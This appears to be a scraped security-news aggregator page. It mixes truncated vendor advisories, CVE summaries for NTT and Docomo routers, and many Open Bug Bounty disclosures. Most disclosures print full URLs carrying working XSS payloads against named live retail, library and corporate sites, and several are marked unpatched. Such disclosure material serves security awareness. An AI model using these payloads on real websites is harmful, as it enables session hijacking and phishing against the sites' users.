Softbank, NTT Docomo, KDDI Security Vulnerabilities

gore-workwear.de XSS vulnerability

Vulnerable URL: http://www.gore-workwear.de/searchtof/index?N=0&Ntx;=mode%2Bmatchallpartial&Ntk;=All&Nty;=1&locale;=tof_de_DE&Ntt;=%22%3Eblub%3Csvg%2Fonload%3Dalert(%2FOPENBUGBOUNTY%2F)%3E%22%3Eblub%3Csvg%2Fonload%3Dalert(%2FOPENBUGBOUNTY%2F)%3E Details: Description| Value ---|--- Patched:| Yes,...

Mozilla Fixes 32 Vulnerabilities in Firefox 54

Mozilla fixed 32 vulnerabilities, including a critical bug that could have resulted in a crash, with the release Tuesday of Firefox 54, the latest version of its flagship browser. The critical bug, a use-after-free vulnerability, was dug up by longtime bug hunter Nils. The vulnerability...

VMware Patches Critical Vulnerabilities in vSphere Data Protection

VMware fixed two critical vulnerabilities in its vSphere Data Protection solution this week that could have allowed an attacker to execute commands on the virtual appliance, among other outcomes. The Department of Homeland Security’s CERT encouraged users and admins on Wednesday to apply the...

walgreens.com XSS vulnerability

Vulnerable URL:...

vSphere Data Protection (VDP) updates address multiple security issues.

a. VDP Java deserialization issue VDP contains a deserialization issue. Exploitation of this issue may allow a remote attacker to execute commands on the appliance. VMware would like to thank Tim Roberts, Arthur Chilipweli, and Kelly Correll from NTT Security for reporting this issue to us. The...

eshop.macsales.com XSS vulnerability

Vulnerable URL:...

CVE-2016-4854

Cross-site request forgery (CSRF) vulnerability in L-04D firmware version V10a and V10b allows remote attackers to hijack the authentication of administrators to perform arbitrary operations via unspecified...

investmentreview.com XSS vulnerability

Open Bug Bounty ID: OBB-238668 Description| Value ---|--- Affected Website:| investmentreview.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1...

search.library.duke.edu XSS vulnerability

Vulnerable URL: http://search.library.duke.edu/search?N=0&Nty;=1&Ntk;=Subject&Ntt;=1%22%2F%3E%3CsvG%2FonLoad%3Dalert%28/OPENBUGBOUNTY/%29%3E&sugg;= Details: Description| Value ---|--- Patched:| No Latest check for patch:| 10.08.2017 Vulnerability type:| XSS Vulnerability status:| Publicly...

salliemae.com XSS vulnerability

Open Bug Bounty ID: OBB-237064 Description| Value ---|--- Affected Website:| salliemae.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1...

mountaingear.us XSS vulnerability

Vulnerable URL: http://www.mountaingear.us/webstore/home.htm?Ntt=89%22%27%2D%2D%21%3E%3CImage%0CSrcset%3DK%0COnerror%3Dconfirm%60OPENBUGBOUNTY%60%0C# Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly...

sgs.com.tr XSS vulnerability

Vulnerable URL: http://www.sgs.com.tr/tr-TR/SearchResults.aspx?N=4294967075&Ntk;=SI_TR-TR_Turkey&Ntt;=%22%27%2D%2D%21> ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa...

sgs.co.uk XSS vulnerability

Vulnerable URL: http://www.sgs.co.uk/en-GB/SearchResults.aspx?N=4294967073&Ntk;=SI_EN-GB_UK&Ntt;=%22%27%2D%2D%21> ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank|...

sgs.vn XSS vulnerability

Vulnerable URL: http://www.sgs.vn/en/SearchResults.aspx?N=4294967071&Ntk;=SI_EN-US_Vietnam&Ntt;=%22%27%2D%2D%21> ##### Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 2661572 VIP website status:|...

sgsgroup.com.ua XSS vulnerability

Vulnerable URL: http://www.sgsgroup.com.ua/ru-RU/SearchResults.aspx?N=4294967074&Ntk;=SI_RU-RU_Ukraine&Ntt;=%22%27%2D%2D%21> ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed ...

sgsgroup.us.com XSS vulnerability

Vulnerable URL: http://www.sgsgroup.us.com/en/SearchResults.aspx?N=4294967072&Ntk;=SI_EN-US_USA&Ntt;=%22%27%2D%2D%21> ##### Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 1174067 VIP website...

jcpenney.com.edgekey.net XSS vulnerability

Vulnerable URL: http://www.jcpenney.com.edgekey.net/s/648?Ntt=648%22--!%3E%3CSvg/Onload=confirm('OPENBUGBOUNTY')%3E%22# Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not.....

us.riverisland.com XSS vulnerability

Vulnerable URL: http://us.riverisland.com/search?Ntt="'--!>{{a="".constructor.prototype;a.charAt=a.trim;$eval("a,confirmOPENBUGBOUNTY,b")}} Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed...

CVE-2016-1198

Photopt for Android before 2.0.1 does not verify SSL...

CVE-2016-1132

Shoplat App for iOS 1.10.00 through 1.18.00 does not properly verify SSL...

worldatwork.org XSS vulnerability

Vulnerable URL:...

SA142 : Invalid TCP Packet Generation DoS in SSL Visibility

SUMMARY The SSL Visibility appliance may, under certain circumstances, generate invalid TCP reset (RST) packets to remote SSL servers when terminating an intercepted SSL connection. Some SSL servers may ignore the invalid RST packet received and keep the TCP connection open. A malicious SSL...

brady.de XSS vulnerability

Vulnerable URL: http://www.brady.de/de-DE/products/productsearch?startingCategory=0&Ntt;=%3E%27%3E%22%3Etr%3Ci%3Etr%3Cscript%20src=https://openbugbounty.org/1.js%3E Details: Description| Value ---|--- Patched:| Yes, at 28.07.2017 Latest check for patch:| 28.07.2017 19:15 GMT Vulnerability type:|...

hi-online.co.za XSS vulnerability

Vulnerable URL: http://www.hi-online.co.za/noResults?Ntt=%3E%27%3E%22%3Ep%3Cimg+src%3Dy+onerror%3Dprompt%28%2Fopenbugbounty%2F%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank|...

duesouthescapes.co.za XSS vulnerability

Open Bug Bounty ID: OBB-218986 Description| Value ---|--- Affected Website:| duesouthescapes.co.za Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1...

witt-international.co.uk XSS vulnerability

Vulnerable URL: http://www.witt-international.co.uk/search/_/N-1c?searchType=FullText&Nty;=1&Ntt;=%27%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 30.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed...

michaelkors.co.uk XSS vulnerability

Vulnerable URL: http://www.michaelkors.co.uk/search/_/N-6f9dqlZzcktlt/Ntt-jeans%22%7D%7D%7D%7D%3C//scriptalert/%22%3E%3Cy%20onafterscriptexecute=%22confirm%60OPENBUGBOUNTY%60%22%3E%3C/script%3Exss%3Cy//a/|//=%20%20confirm.; Details: Description| Value ---|--- Patched:| Yes, at Vulnerability...

vivara.com.br XSS vulnerability

Vulnerable URL: http://www.vivara.com.br/busca?Ntt='-alert('OPENBUGBOUNTY')-' Details: Description| Value ---|--- Patched:| No Latest check for patch:| 28.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 55106 VIP website status:| No Check vivara.com.br SSL...

clasohlson.com XSS vulnerability

Vulnerable URL: http://www.clasohlson.com/se/view/content/search?userSelection=B2B&rememberCookie;=true&N;=0&Ntk;=All&Ntt;=" autofocus onfocus%3dalert%26lpar;"OPENBUGBOUNTY"%26rpar; style%3d"position:fixed;left:0;top:0;display:block;width:100%25;height:100%25;"...

guiacores.com XSS vulnerability

Open Bug Bounty ID: OBB-201103 Description| Value ---|--- Affected Website:| guiacores.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1...

us.topman.com XSS vulnerability

Vulnerable URL: http://us.topman.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=13051&catalogId;=33059&Dy;=1&Nty;=1&beginIndex;=1&pageNum;=1&Ntt;=!%22%3E%3Cvideo%2Fonloadstart%3Dconfirm%28%2FOPENBUGBOUNTY%2F%29+%3C%2Fsrc%3E&x;=0&y;=0&geoip;=noredirect Details:...

dorothyperkins.com XSS vulnerability

Vulnerable URL: http://www.dorothyperkins.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=12552&catalogId;=33053&Dy;=1&Nty;=1&beginIndex;=1&pageNum;=1&Ntt;=%21%22%3E%3Cvideo%2Fonloadstart%3Dconfirm%28%22OPENBUGBOUNTY%22%29+%3C%2Fsrc%3E&x;=0&y;=0 Details:...

eu.topman.com XSS vulnerability

Vulnerable URL: http://eu.topman.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=13061&catalogId;=34064&Dy;=1&Nty;=1&beginIndex;=1&pageNum;=1&Ntt;=!%22%3E%3Cvideo%2Fonloadstart%3Dconfirm%28%22OPENBUGBOUNTY%22%29+%3C%2Fsrc%3E&x;=0&y;=0 Details: Description| Value...

Code Reuse a Peril for Secure Software Development

The amount of insecure software tied to reused third-party libraries and lingering in applications long after patches have been deployed is staggering. It’s a habitual problem perpetuated by developers failing to vet third-party code for vulnerabilities, and some repositories taking a hands-off...

johnlewis.com XSS vulnerability

Open Bug Bounty ID: OBB-197956 Description| Value ---|--- Affected Website:| johnlewis.com Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] Remediation Guide:| OWASP XSS Prevention Cheat.....

zattini.com.br XSS vulnerability

Vulnerable URL: http://www.zattini.com.br/cabelos?Ntt=">// Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 12021 VIP website status:| Yes Check zattini.com.br SSL connection:| (Grade: A) Coordinated Disclosure.....

torontopubliclibrary.ca XSS vulnerability

Vulnerable URL: http://www.torontopubliclibrary.ca/search.jsp?Ntt=%22%3E%3Csvg%2Fonload%3Dalert%28%2FOPENBUGBOUNTY%2F%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 28.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 22402 VIP.....

gore-tex.com XSS vulnerability

Vulnerable URL: http://www.gore-tex.com/searchgoretex/index?Ntt=te%22%3E%3Cimg%20src=x%20onerror=prompt(/OPENBUGBOUNTY/)%3Est&N;=0&Ntx;=mode%2Bmatchallpartial&Ntk;=All&Nty;=1&locale;=en_us Details: Description| Value ---|--- Patched:| Yes, at 28.07.2017 Latest check for patch:| 28.07.2017 12:55...

torontopubliclibrary.ca XSS vulnerability

Vulnerable URL: http://www.torontopubliclibrary.ca/search.jsp?Ntt=%27;alert(0)//%27;alert(1)//%22;alert(2)//%22;alert+(3)//--%3E%3C/SCRIPT%3E%22%3E%27+%3E%3CSCRIPT%3Ealert(/XSSPOSED/)%3C/SCRIPT%3E=&{}%22);}alert(6+);function+xss(){// Details: Description| Value ---|--- Patched:| No Latest check...

wehkamp.nl XSS vulnerability

Vulnerable URL: http://www.wehkamp.nl/Zoeken/ArtikelDetail.aspx?ArtikelNummer=743260&Ntt;=panamaΠ=0&PrI;=8&Nrpp;=96&Blocks;=0&View;=Grid"onmouseover="alert('OPENBUGBOUNTY')" Details: Description| Value ---|--- Patched:| No Latest check for patch:| 30.07.2017 Vulnerability type:| XSS...

gore-tex.fr XSS vulnerability

Vulnerable URL: http://www.gore-tex.fr/searchgoretex/index?Ntt=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E&N;=0&Ntx;=mode%2Bmatchallpartial&Ntk;=All&Nty;=1&locale;=fr_fr Details: Description| Value ---|--- Patched:| Yes, at 28.07.2017 Latest check for patch:| 28.07.2017...

JVN#46351856: Docomo L-04D mobile WiFi router vulnerable to cross-site request forgery

L-04D provided by NTT DOCOMO, INC. is a wireless WiFi router. L-04D contains a cross-site request forgery vulnerability in the the web management screen. ## Impact If a user views a malicious page while logged-in, unintended operations may be conducted. ## Solution Update the firmware Update the...

salliemae.com XSS vulnerability

Vulnerable URL: https://www.salliemae.com/search/?Ntt=%3Cimg%20src=x%20onerror=prompt%28/OPENBUGBOUNTY/%29%3E&Ntk;=all_fields&N;=0 Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 13916 VIP website status:| Yes...

3m.com.ar XSS vulnerability

Vulnerable URL:...

verabradley.com XSS vulnerability

Vulnerable URL: http://www.verabradley.com/browse/_/?Ntt=test%22%3C/script%3E%3Csvg%20onload=onload=prompt(%22OPENBUGBOUNTY%22)%3E Details: Description| Value ---|--- Patched:| Yes, at 27.07.2017 Latest check for patch:| 27.07.2017 22:40 GMT Vulnerability type:| XSS Vulnerability status:|...

CVE-2016-1228

Cross-site request forgery (CSRF) vulnerability on NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allows remote attackers to hijack the...

CVE-2016-1228

Cross-site request forgery (CSRF) vulnerability on NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allows remote attackers to hijack the...

CVE-2016-1227

NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allow remote authenticated users to execute arbitrary OS commands via unspecified...

CVE-2016-1227

NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allow remote authenticated users to execute arbitrary OS commands via unspecified...

Cross site request forgery (csrf)

Cross-site request forgery (CSRF) vulnerability on NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allows remote attackers to hijack the...